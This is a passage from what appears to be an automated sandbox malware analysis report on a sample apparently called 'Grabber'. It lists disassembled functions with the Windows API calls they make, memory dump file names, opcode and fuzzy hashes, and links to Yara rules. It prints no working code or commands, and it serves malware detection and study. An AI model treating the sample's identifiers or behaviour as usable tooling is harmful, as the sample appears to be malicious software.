                                                                                                                                                                                                                          • API String ID: 85618057-0
                                                                                                                                                                                                                          • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                          • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                                                                                                                                                                                                                          Function 00403001 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                            • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                            • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                                                                                                                                                                                                            • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                                                                                                                                                                                                            • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                            • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                            • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                            • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                            • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                            • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                            • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                            • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                            • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                                                                                                                                                                                                          • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                          • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02197F20,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                                                                                                                                                                                                            • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                                                                                                                                                                                                                          • String ID: $pA
                                                                                                                                                                                                                          • API String ID: 790731606-4007739358
                                                                                                                                                                                                                          • Opcode ID: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                                                                                                                                                                                                          • Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fafddd55d836537589261c709968970c6775ae1a276d84be64f2893e19f462a9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D
                                                                                                                                                                                                                          Function 004024F1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                                                                                                                                                                                                          • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                                                                            • Part of subcall function 0040DF50: HeapFree.KERNEL32(02190000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                                                                                                                                                                                                          • String ID: *pA
                                                                                                                                                                                                                          • API String ID: 1199808876-3833533140
                                                                                                                                                                                                                          • Opcode ID: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                                                                                                                                                                                                          • Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d71b0a94e292aaa5df852a5f67a936174220f907fb1fd7f815eb7f58dc0b4ad1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E
                                                                                                                                                                                                                          Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
                                                                                                                                                                                                                            • Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$AllocCommandHeapLine
                                                                                                                                                                                                                          • String ID: $"
                                                                                                                                                                                                                          • API String ID: 1339485270-3817095088
                                                                                                                                                                                                                          • Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                          • Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369
                                                                                                                                                                                                                          Function 00409FB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpwcscmp
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 3419221977-513306843
                                                                                                                                                                                                                          • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                          • Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A
                                                                                                                                                                                                                          Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                                          • String ID: $0A
                                                                                                                                                                                                                          • API String ID: 626452242-513306843
                                                                                                                                                                                                                          • Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                          • Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC
                                                                                                                                                                                                                          Function 0040D57F Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 830345296-0
                                                                                                                                                                                                                          • Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                          • Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94
                                                                                                                                                                                                                          Function 0040E130 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040E145
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(02190000,00000000,0000000A), ref: 0040E169
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(02190000,00000000,00000000,0000000A), ref: 0040E18D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(02190000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Alloc$Freewcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2479713791-0
                                                                                                                                                                                                                          • Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                          • Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94
                                                                                                                                                                                                                          Function 0040D498 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
                                                                                                                                                                                                                          • HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E
                                                                                                                                                                                                                            • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 830345296-0
                                                                                                                                                                                                                          • Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                          • Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65
                                                                                                                                                                                                                          Function 0040D6DD Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1298188129-0
                                                                                                                                                                                                                          • Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                          • Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8
                                                                                                                                                                                                                          Function 00409ECF Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182
                                                                                                                                                                                                                            • Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                                                                                                                                                                                                            • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                                                                                                                                                                                                            • Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
